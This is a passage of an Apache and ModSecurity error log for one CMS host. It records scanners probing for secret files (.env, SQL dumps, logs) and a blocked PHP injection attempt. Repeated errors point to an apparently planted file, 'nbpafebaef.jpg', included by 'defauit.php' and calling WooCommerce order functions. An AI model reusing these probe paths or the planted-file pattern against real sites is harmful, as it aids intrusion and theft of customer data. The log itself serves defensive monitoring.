.com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aJz49TSzh4MhgQx9hZdVFwAAARI"] [Wed Aug 13 23:43:33.100465 2025] [:error] [pid 15178:tid 15192] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aJz49TSzh4MhgQx9hZdVGAAAAQI"] [Wed Aug 13 23:43:33.106680 2025] [:error] [pid 15178:tid 15201] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aJz49TSzh4MhgQx9hZdVGQAAAQs"] [Wed Aug 13 23:43:39.060046 2025] [:error] [pid 15178:tid 15203] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/awslogs.log"] [unique_id "aJz4-zSzh4MhgQx9hZdVLwAAAQ0"] [Wed Aug 13 23:43:39.066238 2025] [:error] [pid 15178:tid 15208] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/cloud-init.log"] [unique_id "aJz4-zSzh4MhgQx9hZdVMAAAARI"] [Wed Aug 13 23:43:43.983886 2025] [:error] [pid 15178:tid 15197] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aJz4_zSzh4MhgQx9hZdVRgAAAQc"] [Sat Aug 30 14:34:09.595908 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:09.595957 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:09.596039 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] [Sat Aug 30 14:34:09 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:09.596043 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] [Sat Aug 30 14:34:10.377071 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:10.377121 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:10.377197 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] [Sat Aug 30 14:34:10 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:10.377202 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] [Sat Aug 30 14:34:10.597446 2025] [log_config:warn] [pid 983:tid 1009] (28)No space left on device: [client 34.11.246.179:57135] AH00646: Error writing to /usr/local/apache/domlogs/cms-1.dev-unit.com.log [Sat Aug 30 14:34:11.520753 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:11.520799 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:11.520890 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] [Sat Aug 30 14:34:11 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:11.520895 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] [Sat Aug 30 14:34:11.732848 2025] [log_config:warn] [pid 983:tid 1005] (28)No space left on device: [client 34.11.246.179:57135] AH00646: Error writing to /usr/local/apache/domlogs/cms-1.dev-unit.com.log [Sat Aug 30 14:34:12.840250 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:12.840303 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:12.840399 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] [Sat Aug 30 14:34:12 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:12.840407 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] [Sat Aug 30 14:34:13.045037 2025] [log_config:warn] [pid 983:tid 1000] (28)No space left on device: [client 34.11.246.179:57135] AH00646: Error writing to /usr/local/apache/domlogs/cms-1.dev-unit.com.log [Sat Aug 30 14:34:13.940408 2025] [:error] [pid 983:tid 1006] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:13[Wed Sep 03 14:02:59.113846 2025] [:error] [pid 27308:tid 27315] [client 185.177.72.106:58816] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aLggYxc2qCXtIvVdmfcGGgAAAMU"] [Wed Sep 03 14:03:09.783472 2025] [access_compat:error] [pid 27308:tid 27331] [client 185.177.72.106:58816] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Sep 03 14:03:17.481306 2025] [:error] [pid 27308:tid 27328] [client 185.177.72.106:58816] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aLggdRc2qCXtIvVdmfcGdQAAANI"] [Thu Sep 04 07:56:55.440254 2025] [:error] [pid 26362:tid 26373] [client 185.177.72.236:5608] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aLkcF4De96GZLWV-VCs_VQAAAMk"] [Thu Sep 04 07:57:06.225379 2025] [access_compat:error] [pid 26362:tid 26377] [client 185.177.72.236:5608] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Sep 04 07:57:13.895728 2025] [:error] [pid 26362:tid 26373] [client 185.177.72.236:5608] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aLkcKYDe96GZLWV-VCs_zAAAAMk"] [Sat Sep 20 11:33:17.009117 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 11:33:17.009324 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 11:33:17.009456 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 11:33:17.009547 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 11:33:17.009559 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] Stack trace:, referer: https://www.google.com [Sat Sep 20 11:33:17.009609 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 11:33:17.009619 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] #1 {main}, referer: https://www.google.com [Sat Sep 20 11:33:17.009666 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Sat Sep 20 17:32:40.666503 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 17:32:40.666689 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 17:32:40.666819 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 17:32:40.666911 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 17:32:40.666923 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] Stack trace:, referer: https://www.google.com [Sat Sep 20 17:32:40.666971 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 17:32:40.666981 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] #1 {main}, referer: https://www.google.com [Sat Sep 20 17:32:40.667030 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Mon Sep 22 14:44:16.798300 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Mon Sep 22 14:44:16.798493 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 14:44:16.798622 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 14:44:16.798711 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Mon Sep 22 14:44:16.798723 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] Stack trace:, referer: https://www.google.com [Mon Sep 22 14:44:16.798769 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Mon Sep 22 14:44:16.798778 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] #1 {main}, referer: https://www.google.com [Mon Sep 22 14:44:16.798826 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Tue Sep 23 19:07:34.077614 2025] [:error] [pid 8361:tid 8366] [client 20.171.207.145:48978] [client 20.171.207.145] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aNLFxnNXo-ZiWSoqk0YYCwAAAQM"] [Tue Sep 23 19:11:53.698498 2025] [autoindex:error] [pid 8361:tid 8385] [client 20.171.207.145:48978] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Sep 23 19:39:20.132755 2025] [core:error] [pid 19147:tid 19153] [client 20.171.207.145:42796] AH10244: invalid URI path (/assets/front/js/%url%) [Wed Sep 24 10:46:42.806103 2025] [:error] [pid 24179:tid 24195] [client 210.0.138.248:43969] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 13:23:39.725823 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 13:23:39.726135 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] PHP Warning: require_once(/home/id/cms-1.dev-unit.com/config/config.inc.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 13:23:39.726263 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] PHP Fatal error: Uncaught Error: Failed opening required '/home/id/cms-1.dev-unit.com/config/config.inc.php' (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:3, referer: https://www.google.com [Thu Sep 25 13:23:39.726280 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] Stack trace:, referer: https://www.google.com [Thu Sep 25 13:23:39.726327 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Sep 25 13:23:39.726337 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] #1 {main}, referer: https://www.google.com [Thu Sep 25 13:23:39.726391 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 15:41:14.272926 2025] [:error] [pid 16577:tid 16583] [client 207.154.240.68:48480] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 18:31:36.138498 2025] [:error] [pid 16479:tid 16545] [client 61.222.202.149:42663] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 11:22:37.239075 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 11:22:37.239289 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 11:22:37.239420 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 11:22:37.239511 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Sun Sep 28 11:22:37.239523 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] Stack trace:, referer: https://www.google.com [Sun Sep 28 11:22:37.239568 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sun Sep 28 11:22:37.239578 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] #1 {main}, referer: https://www.google.com [Sun Sep 28 11:22:37.239626 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Tue Sep 30 15:12:55.823662 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Sep 30 15:12:55.823852 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 15:12:55.823974 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 15:12:55.824063 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Tue Sep 30 15:12:55.824075 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] Stack trace:, referer: https://www.google.com [Tue Sep 30 15:12:55.824125 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Tue Sep 30 15:12:55.824136 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] #1 {main}, referer: https://www.google.com [Tue Sep 30 15:12:55.824184 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Wed Oct 01 17:48:48.904965 2025] [:error] [pid 14547:tid 14561] [client 207.154.240.68:41744] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Oct 07 12:32:03.134963 2025] [:error] [pid 4855:tid 4990] [client 139.59.136.184:59504] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag 